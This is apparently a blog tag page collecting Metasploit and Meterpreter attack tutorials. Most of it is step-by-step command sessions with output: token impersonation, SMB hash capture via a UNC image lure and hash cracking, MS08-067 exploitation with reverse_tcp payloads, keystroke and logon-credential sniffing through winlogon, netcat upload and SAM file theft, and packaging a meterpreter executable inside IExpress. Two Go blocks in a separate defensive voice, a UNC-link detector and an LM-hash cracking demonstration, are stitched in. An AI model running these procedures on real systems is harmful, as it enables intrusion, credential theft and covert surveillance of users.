All Entries Tagged With: "metasploit"

Social Engineer Toolkit – Website Attack How To

I found this while wandering about the web. Be careful – it works!

Social Engineering Toolkit – Website Attack How To

As with all things “hack” – be careful how you proceed. The opportunity to hack is always there – the ability to show constraint and remain ethical is a necessity! ‘Nuff said.

Enjoy.

Metasploit 3.3 for iPhone

Download the stripped down metasploit 3.3 snapshot that should be iPhone/iTouch friendly – from HDMoore

Download: Metasploit 3.3 for iPhone

Make sure you visit http://www.metasploit.com for more information and details about the full blown Metasploit tool.

Metasploit on the iPod Touch – hacking an xp sp2 host

This is awesome – how to pwn an XP SP2 box from an iPod Touch! I love this stuff!

More on working with Incognito and Metasploit

From Carnal0wnage http://carnal0wnage.blogspot.com

Since a buddy asked for some clarification on using incognito extension with Metasploit/Meterpreter I’ll post some more notes on it.

The background you need is here:

http://www.mwrinfosecurity.com/publications/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf

Let’s set up the scenario.

We either exploited something…yea! or we guessed an admin password and used the psexec module (that’s what I did). The psexec module will drop us to a SYSTEM shell if all went well.

msf exploit(psexec) > sessions

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.102:52595 -> 192.168.1.103:31851

msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: ORACLE-ENT
OS : Windows .NET Server (Build 3790, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > use incognito
Loading extension incognito...success.

Now we want to query what tokens are available.

Incognito Commands
==================

Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token

meterpreter > list_tokens
Usage: list_tokens

Lists all accessible tokens and their privilege level

OPTIONS:

-g List tokens by unique groupname
-u List tokens by unique username

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
ORACLE-ENT\Administrator

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

We want to become the ORACLE-ENT\Administrator user.

meterpreter > impersonate_token
Usage: impersonate_token

Instructs the meterpreter thread to impersonate the specified token. All other actions
will then be made in the context of that token.

Hint: Double backslash DOMAIN\\name (meterpreter quirk)
Hint: Enclose with quotation marks if name contains a space

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token ORACLE-ENT\\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENT\Administrator
meterpreter > getuid
Server username: ORACLE-ENT\Administrator

Ok, should you need to get back to system, just do a rev2self

meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token ORACLE-ENT\\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENT\Administrator
meterpreter > getuid
Server username: ORACLE-ENT\Administrator

Now you’ll probably want to run commands as that user…I hope that was the point of all this…

After you load the incognito extension you’ll get an extra option with your execute options (-t)

meterpreter > execute
Usage: execute -f file [options]

Executes a command on the remote machine.

OPTIONS:

-H Create the process hidden from view.
-a The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d The 'dummy' executable to launch when using -m.
-f The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-m Execute from memory.
-t Execute process with currently impersonated thread token

We need to use the “-t” so we can use the impersonated thread token, otherwise you’ll get a shell as SYSTEM or whoever you were.

meterpreter > execute -f cmd.exe -H -c -i -t
Process 2936 created.
Channel 6 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\>whoami
whoami
oracle-ent\administrator

C:\>

Using the Metasploit SMB Sniffer Module

From the Carnal0wnage blog

There has been some talk about using the SMB Relay module in Metasploit and then trying to crack those hashes. I’ll spare the links to protect the uninformed.

The SMB Relay module is for doing just what it says, relaying the SMB session back to another host. It used to be the same host but now, post 08-068, you have to pick another system on the network. Doesn’t matter what system, just not the same system. (I’ll try to cover this in another blog post soon)

Additionally, the SMB Relay module provides a random challenge for each attempt and doesn’t log those challenges anywhere that you could go back and use. So that pretty much rules out using the hashes you see in the output for password cracking.

For background it looks like this which looks just like the one that will work :-(

[*] Received 192.168.0.103:2281 XPSP1VM\vmwareXP LMHASH:7c83b9be93e202a4be355b75e982144b59bb9f836ec26200 NTHASH:9fc0fba25cb2817441a0ca8c003a4b68da83ef9e72514b2e OS:Windows 2002 2600 Service Pack 1 LM:Windows 2002 5.1

So what are we to do? Use the SMB Sniffer module of course!

The SMB sniffer module allows you to capture LM/NTLM hashes that can be cracked later. It uses a known challenge key which allows you to crack the hash offline.

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > info

Name: Authentication Capture: SMB
Version: 5966

Provided by: hdm

Description:
This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. All responses sent by this service have the same hardcoded challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel or L0phtcrack. To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path(\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.

We need to force a victim to authenticate to metasploit. The easiest way is to embed a UNC link into a webpage or email.

Example: <img src="\\networkIP\share\1.gif">

Once the victim’s browser tries to authenticate, the sniffer module will capture the hashes (which can be cracked later using rainbow tables). You’ll notice the difference between this module and SMB Relay which issues a random challenge making cracking impossible. So if you want to crack passwords, use the server/capture/smb auxiliary module, if you want to try to get a shell use the smb_relay exploit module.
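The UNC-in-a-web-page trick described above is also something a mail gateway or web proxy can look for. The following is an added example written for this page, not code from the Carnal0wnage post or from Metasploit: it scans an HTML body for `src`/`href`-style attributes whose value is a `\\host\share\...` path (the form the post shows) and marks each host against an allowlist of file servers the organisation actually uses. The sample message, the `192.0.2.10` address and the `fileserver` allowlist entry are constructed for the demonstration.

```go
package main

import (
	"fmt"
	"net"
	"regexp"
	"strings"
)

// uncRef matches an HTML attribute whose value is a UNC path (\\host\share...).
// Group 1 is the attribute name, group 2 the whole path, group 3 the host.
var uncRef = regexp.MustCompile(`(?i)\b(src|href|background|action)\s*=\s*["']?(\\\\([^\\\s"'<>]+)\\[^\s"'<>]*)`)

// UNCFinding records one reference that would make a Windows client open an
// SMB connection (and send an NTLM/LM response) when the content is rendered.
type UNCFinding struct {
	Attr    string // attribute that carried the path (src, href, ...)
	Path    string // the full \\host\share\... value
	Host    string // server the client would authenticate to
	Trusted bool   // host is a named, allowlisted internal file server
}

// findUNCReferences scans markup (a web page or HTML e-mail) for UNC
// references. A host given as an IP literal, or any name outside the
// allowlist, is left untrusted; those are the findings worth alerting on.
func findUNCReferences(markup string, allowlist map[string]bool) []UNCFinding {
	var found []UNCFinding
	for _, m := range uncRef.FindAllStringSubmatch(markup, -1) {
		host := strings.ToLower(m[3])
		trusted := allowlist[host] && net.ParseIP(host) == nil
		found = append(found, UNCFinding{
			Attr:    strings.ToLower(m[1]),
			Path:    m[2],
			Host:    host,
			Trusted: trusted,
		})
	}
	return found
}

// untrustedHosts returns the hosts a content filter would block or report.
func untrustedHosts(findings []UNCFinding) []string {
	var hosts []string
	for _, f := range findings {
		if !f.Trusted {
			hosts = append(hosts, f.Host)
		}
	}
	return hosts
}

// sampleMessage is a constructed HTML e-mail body: an ordinary image, a 1x1
// image pointing at a UNC path on an IP literal (the pattern in the post),
// and a link to an internal file server.
const sampleMessage = `<html><body>
<p>Quarterly report attached.</p>
<img src="https://intranet.example/logo.png">
<img src="\\192.0.2.10\share\1.gif" width="1" height="1">
<a href='\\fileserver\public\report.docx'>report</a>
</body></html>`

func main() {
	allow := map[string]bool{"fileserver": true} // constructed allowlist
	findings := findUNCReferences(sampleMessage, allow)
	for _, f := range findings {
		fmt.Printf("%-4s -> %-32s host=%-12s trusted=%v\n", f.Attr, f.Path, f.Host, f.Trusted)
	}
	fmt.Println("alert on:", untrustedHosts(findings))
}
```

The regular expression deliberately stops at quotes, whitespace and angle brackets so a path embedded in a larger attribute value is still caught, and the allowlist is keyed on lower-cased host names so `FILESERVER` and `fileserver` are treated the same. On the sample body the scanner reports two references and flags only the IP-literal host.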

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > run
[*] Auxiliary module running as background job
msf auxiliary(smb) >
[*] Server started.
[*] Captured 192.168.0.101:57794 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
[*] Captured 192.168.0.101:44641 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
[*] Captured 192.168.0.101:49777 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1

We can now use HALFLM rainbow tables with the 1122334455667788 challenge to crack the first half of the password.

**We only take the first 16 characters of the LM password

LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d

We can then use rainbow tables to crack the first half:

$ ./rcracki *.rti -h 76365e2d142b5612
halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p][i]_0.rti:
reading...
264241152 bytes read, disk access time: 4.97 s
verifying the file...
searching for 1 hash...
plaintext of 76365e2d142b5612 is PASSWOR
cryptanalysis time: 5.24 s

statistics
-------------------------------------------------------
plaintext found: 1 of 1 (100.00%)
total disk access time: 4.97 s
total cryptanalysis time: 5.24 s
total chain walk step: 1783216
total false alarm: 591
total chain walk step due to false alarm: 703255

result
-------------------------------------------------------
76365e2d142b5612 PASSWOR hex:50415353574f52

You will have to guess or bruteforce the rest :-( but thankfully there is a tool in your metasploit tools directory to help you do just that!

$ ruby halflm_second.rb

Usage: halflm_second.rb

OPTIONS:

-h Display this help information
-n The encypted LM hash to crack
-p The decrypted LANMAN password for bytes 1-7

$ ruby halflm_second.rb -n 76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d -p PASSWOR
[*] Trying one character...
[*] Cracked: PASSWORD
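To show why the hardcoded challenge is what makes the capture crackable, here is an added example in Go; it is not the blog's code, nor Metasploit's `halflm_second.rb`. It implements the LM one-way function and the LMv1 challenge-response as specified in MS-NLMP, checks a candidate password against the `LMHASH` value captured above under the module's `\x11\x22\x33\x44\x55\x66\x77\x88` challenge, and demonstrates the two properties the post relies on: the first 8 bytes of the response depend only on the first 7 characters (why HALFLM tables only need to cover 7-character prefixes), and the whole response changes with the challenge (why a random per-session challenge defeats such tables). The `PASSWORX` candidate and the second challenge are constructed for the demonstration.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"math/bits"
	"strings"
)

// Challenge hardcoded by auxiliary/server/capture/smb, as quoted in the
// module description above.
var fixedChallenge = []byte{0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88}

// LM response captured for XPSP1VM\Administrator in the output above.
const capturedLMResponse = "76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d"

// desKey8 expands a 7-byte (56-bit) key into the 8-byte DES key layout:
// seven key bits per byte with an odd parity bit in the low position.
func desKey8(b []byte) []byte {
	k := []byte{
		b[0],
		b[0]<<7 | b[1]>>1,
		b[1]<<6 | b[2]>>2,
		b[2]<<5 | b[3]>>3,
		b[3]<<4 | b[4]>>4,
		b[4]<<3 | b[5]>>5,
		b[5]<<2 | b[6]>>6,
		b[6] << 1,
	}
	for i := range k {
		k[i] &= 0xFE
		if bits.OnesCount8(k[i])%2 == 0 {
			k[i] |= 1 // DES ignores the parity bit, but the layout defines it as odd
		}
	}
	return k
}

// desEncrypt encrypts one 8-byte block under a 7-byte key.
func desEncrypt(key7, block []byte) []byte {
	c, err := des.NewCipher(desKey8(key7))
	if err != nil {
		panic(err) // cannot happen: the expanded key is always 8 bytes
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// lmHash is the LAN Manager one-way function: uppercase, pad or cut to 14
// bytes, DES-encrypt the constant "KGS!@#$%" under each 7-byte half.
// The halves are independent, which is the weakness HALFLM tables target.
func lmHash(password string) []byte {
	p := make([]byte, 14)
	copy(p, strings.ToUpper(password))
	magic := []byte("KGS!@#$%")
	return append(desEncrypt(p[:7], magic), desEncrypt(p[7:], magic)...)
}

// lmResponse is the LMv1 challenge-response: the 16-byte LM hash is zero
// padded to 21 bytes, split into three 7-byte keys, and each key encrypts
// the 8-byte server challenge. This 24-byte value is what the capture
// module prints as LMHASH.
func lmResponse(password string, challenge []byte) []byte {
	k := make([]byte, 21)
	copy(k, lmHash(password))
	var out []byte
	for i := 0; i < 21; i += 7 {
		out = append(out, desEncrypt(k[i:i+7], challenge)...)
	}
	return out
}

// matchesCapture reports whether candidate explains a captured response
// under the given challenge. With a fixed challenge the computed side is a
// pure function of the password and can be tabulated in advance; with a
// fresh random challenge per session the same table is useless.
func matchesCapture(candidate string, challenge []byte, capturedHex string) bool {
	want, err := hex.DecodeString(capturedHex)
	if err != nil || len(want) != 24 {
		return false
	}
	return bytes.Equal(lmResponse(candidate, challenge), want)
}

func main() {
	fmt.Printf("LM hash of PASSWORD: %x\n", lmHash("PASSWORD"))
	fmt.Printf("capture matches PASSWORD: %v\n", matchesCapture("PASSWORD", fixedChallenge, capturedLMResponse))
	a := lmResponse("PASSWORD", fixedChallenge)
	b := lmResponse("PASSWORX", fixedChallenge)
	fmt.Printf("first 8 bytes equal for PASSWORD and PASSWORX: %v\n", bytes.Equal(a[:8], b[:8]))
	other := []byte{0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08} // constructed second challenge
	fmt.Printf("response unchanged under another challenge: %v\n", bytes.Equal(a, lmResponse("PASSWORD", other)))
}
```

The known-answer value for the LM hash of `PASSWORD` (`e52cac67419a9a224a3b108f3fa6cb6d`) lets the DES key expansion be checked independently of the capture. The durable fix on the defending side is not a random challenge but refusing to emit LM and NTLMv1 responses at all, which on Windows is the `LmCompatibilityLevel` setting at 3 or higher.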

Meterpreter script for recording through a target's microphone

From PaulDotCom

Here’s a script for recording through a target's microphone. This was posted by PaulDotCom on Twitter, but if you think this should not be posted here, let me know! I think in the world of hacking, ethical or not, you have to know what the meterpreter shell is – once you find that out you have to work out how to effectively use it – not intuitive but oh so much fun – so perhaps this will be used by those that know, you know?

Download: DHCP & IP Information

Remote Keystroke Sniffing with Meterpreter

posted by HDM here

Earlier this afternoon, I committed some code to allow keystroke sniffing through Meterpreter sessions. This was implemented as a set of new commands for the stdapi extension of Meterpreter. Dark Operator, author of many great Meterpreter scripts, already wrote a nice blog post describing how to use the new keystroke sniffer, but I wanted to cover some of the internals and limitations as well.

The keyscan_start command spawns a new thread inside of the process where Meterpreter was injected. This thread allocates a large 1Mb buffer to store captured keystrokes. Every 30 ms, this thread calls GetAsyncKeyState, which returns the up/down status of each of the 256 possible Virtual Key Codes. If a key state change is detected and the new state is down, the key, along with the Shift, Control, and Alt flags, is stored into the buffer as a 16-bit value. If the entire buffer is used, it skips back to the beginning and overwrites old entries. This poll/compare method is based on a keyboard status application written by Rick, who presented at the last San Antonio Hackers meeting (and presents at Austin Hackers frequently).

One limitation of the GetAsyncKeyState function is that it must have access to the active, input desktop in order to monitor the key states. This presents a problem when the target process is running as a service. In the case of the VNC injection payload, we jump through a series of hoops to get access to the input desktop. This sequence has now been implemented as the grabdesktop command, but this is still not sufficient in many cases. If the service does not have rights to interact with the desktop, no amount of API jumping allows the GetAsyncKeyState function to receive keystrokes from the user.

Fortunately, Meterpreter supports the migrate command, which allows us to move our running code into a process that does have interactive access to the desktop. In the example below, we will use ms08_067_netapi exploit to obtain a Meterpreter shell on a Windows XP SP2 system, then migrate the running payload into the Explorer.exe process owned by the active user. This allows us to then use the keyscan_start and keyscan_dump commands to log the user’s keystrokes.

$ msfconsole

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set RHOST 192.168.0.118
RHOST => 192.168.0.118

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
LHOST => 192.168.0.139

msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3

msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened

meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]

meterpreter > migrate 316
[*] Migrating to 316…
[*] Migration completed successfully.

meterpreter > getpid
Current pid: 316

meterpreter > grabdesktop
Trying to hijack the input desktop…

meterpreter > keyscan_start
Starting the keystroke sniffer…

meterpreter > keyscan_dump
Dumping captured keystrokes…

This is a test of the keystroke logger <Comma> I am typing this inside of notepad.

Capturing Logon Credentials with Meterpreter

posted by HDM here

In my previous post, I described the keystroke sniffing capabilities of the Meterpreter payload. One of the key restrictions of this feature is that it can only sniff while running inside of a process with interactive access to the desktop. In the case of the MS08-067 exploit, we had to migrate into Explorer.exe in order to capture the logged-on user’s keystrokes.

While testing the keystroke sniffer, it occurred to me to migrate into the Winlogon.exe process instead. This process should have interactive access to the desktop, however when I tried to sniff the active user’s keystrokes this way, it was not successful. Although Winlogon could not access the logged-on desktop using GetAsyncKeyState, it can capture the username and password of anyone logging into the target’s console. The example below demonstrates this process:

msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened

meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]

meterpreter > migrate 440
[*] Migrating to 440…
[*] Migration completed successfully.

meterpreter > keyscan_start
Starting the keystroke sniffer…
[ wait for user login ]

meterpreter > keyscan_dump
Dumping captured keystrokes…
Administrator <Tab> s3cretp4ss <Return>

Key logger fun …

Here’s a little something from pastie.org, pointed out by hdmoore on Twitter (a mine of interesting information!). Capture the logged-in user's keystrokes, without disk access, after exploiting MS08-067, through migrate: http://pastie.org/423800

Deploying meterpreter as an exploit payload

There are various ways of deploying the meterpreter payload. This short article deals with deploying meterpreter as an exploit payload. This article is not about exploiting the machine! I assume here that you have already done that. Assuming I have gained a meterpreter shell on my exploited machine I want to upload netcat to the ‘windows’ directory, and download the ‘not so hidden’ SAM file backup in the windows\repair directory.

meterpreter > upload /home/tools/nc.exe c:\windows
[*] uploading : /home/tools/nc.exe -> c:\windows
[*] uploaded : /home/tools/nc.exe -> c:\windows\nc.exe
meterpreter >

meterpreter > download c:\windows\repair\sam /tmp
[*] downloading: c:\windows\repair\sam -> /tmp
[*] downloaded : c:\windows\repair\sam -> /tmp/sam

Let’s take a look at the process list …

meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
404 smss.exe \SystemRoot\System32\smss.exe
476 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
648 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
. . .

There’s more – you might be looking for a particular process. For this example I just wanted to show the command, simple as it is.

Now I want a DOS prompt (cmd.exe) and want to interact with it.

meterpreter > execute -f cmd -c
Process 1055 created.
Channel 2 created.
meterpreter > interact 2
Interacting with channel 2...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files>exit
exit
meterpreter >

… and there you have it.

Hiding meterpreter in IExpress

This is the second time I’ve seen this on the web – this time it’s on YouTube. It’s pertinent though: I’ve packaged other executables inside the calculator executable before, but this one is an eye opener. Take a look and let me know what you think.

Commands from video:

* ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=1080 X > /tmp/academy/bob.exe
* (For python 2.4+) python -m SimpleHTTPServer
* (For python 2.3 -) python -c "from SimpleHTTPServer import test; test()"
* Start -> Run -> iexpress
* Run multi/handler from the command line (not shown in video)

Links from video:

* http://www.metasploit.com/
* http://www.shell-fu.org/
* http://www.microsoft.com/technet/prodtechnol/ie/ieak/techinfo/deploy/60/en/iexpress.mspx?mfr=true
* http://www.virustotal.com/
* http://www.theacademypro.com/
* http://www.theacademyhome.com/